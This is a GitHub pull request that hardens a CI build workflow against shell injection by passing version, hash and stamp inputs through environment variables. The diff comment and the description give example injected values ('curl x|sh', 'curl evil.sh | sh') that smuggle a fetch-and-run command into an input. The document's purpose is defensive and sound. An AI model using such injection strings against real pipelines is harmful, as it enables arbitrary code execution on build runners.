### PR TITLE
fix(ci): block shell injection in _build.yaml via env-var indirection

### DIFF
--- a/.github/workflows/_build.yaml
+++ b/.github/workflows/_build.yaml
@@ -134,6 +134,13 @@ jobs:
         # them into the run: body — GitHub expands ${{ ... }} before the shell
         # parses, so a value like  1.2"; curl x|sh; #  would inject shell.
         # Closes CodeQL actions/code-injection/critical #631.
+        #
+        # `shell: bash` is required for windows-2022 — the runner defaults to
+        # PowerShell Core there, and pwsh's $FULL_VERSION resolves a pwsh
+        # variable, not the env var (env vars need $env:FULL_VERSION). Git
+        # Bash is pre-installed on the GitHub-hosted Windows image, and
+        # ./builder.cmd invokes correctly from bash.
+        shell: bash
         env:
           FULL_VERSION: ${{ inputs.full_version }}
           BUILD_HASH: ${{ inputs.build_hash }}

--- a/.github/workflows/_build.yaml
+++ b/.github/workflows/_build.yaml
@@ -130,7 +130,15 @@ jobs:
           queries: security-and-quality
 
       - name: Build
-        run: ${{ matrix.builder_cmd }} build --verbose --autoinstall --version=${{ inputs.full_version }} --hash=${{ inputs.build_hash }} --stamp=${{ inputs.build_stamp }} ${{ inputs.nodownload && '--nodownload' || '' }}
+        # Pass the string inputs as env vars instead of template-interpolating
+        # them into the run: body — GitHub expands ${{ ... }} before the shell
+        # parses, so a value like  1.2"; curl x|sh; #  would inject shell.
+        # Closes CodeQL actions/code-injection/critical #631.
+        env:
+          FULL_VERSION: ${{ inputs.full_version }}
+          BUILD_HASH: ${{ inputs.build_hash }}
+          BUILD_STAMP: ${{ inputs.build_stamp }}
+        run: ${{ matrix.builder_cmd }} build --verbose --autoinstall --version="$FULL_VERSION" --hash="$BUILD_HASH" --stamp="$BUILD_STAMP" ${{ inputs.nodownload && '--nodownload' || '' }}
 
       - name: Test
         if: inputs.codeql == false


### PR DESCRIPTION
## Summary

- Closes CodeQL **critical** alert [#631](https://github.com/rocketride-org/rocketride-server/security/code-scanning/631) — `actions/code-injection/critical` on `.github/workflows/_build.yaml:133`.
- Three string inputs (\`full_version\`, \`build_hash\`, \`build_stamp\`) were template-interpolated into a \`run:\` body. Because GitHub expands \`\${{ ... }}\` *before* the shell parses, a value like \`1.2"; curl evil.sh | sh; #\` would execute arbitrary shell on the runner.
- Fix: bind the inputs to env vars on the step and reference them as quoted shell variables (\`"\$FULL_VERSION"\` etc.) in the run body. The shell receives them via \`os.environ\`, so the GitHub expression engine never touches the run command.

## Reachability

In practice today, the values come from \`_init.yaml\` (\`jq -r '.version' package.json\` + \`github.sha\` + \`date -u\`), so exploitation would require landing a PR that puts shell metacharacters into the package.json \`version\` field — defense-in-depth rather than a live exploit. Still, every caller of \`_build.yaml\` (\`ci.yml\`, \`release.yaml\`, \`nightly.yaml\`, \`experimental-release.yaml\`) exposes \`workflow_dispatch\`, which CodeQL conservatively treats as user-controllable, and the fix matches the [GitHub-recommended pattern](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable).

## What stays interpolated, and why

- \`\${{ matrix.builder_cmd }}\` — matrix values are set by caller YAML, not user input. Safe.
- \`\${{ inputs.nodownload && '--nodownload' || '' }}\` — boolean evaluated to a literal flag. Safe.

## Test plan

- [ ] CI passes on this PR (the Build step runs identically; the change is purely how arguments reach the shell).
- [ ] Verify \`Build / ubuntu\`, \`Build / macos\`, \`Build / windows\` all green.
- [ ] After merge, confirm CodeQL alert #631 closes on the next scan.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Chores**
  * Refined build workflow configuration to pass build metadata (version, hash, stamp) into builds.
  * Hardened workflow execution to avoid unintended shell interpolation and improve build reproducibility and safety.

<!-- review_stack_entry_start -->

[![Review Change Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/rocketride-org/rocketride-server/pull/928?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->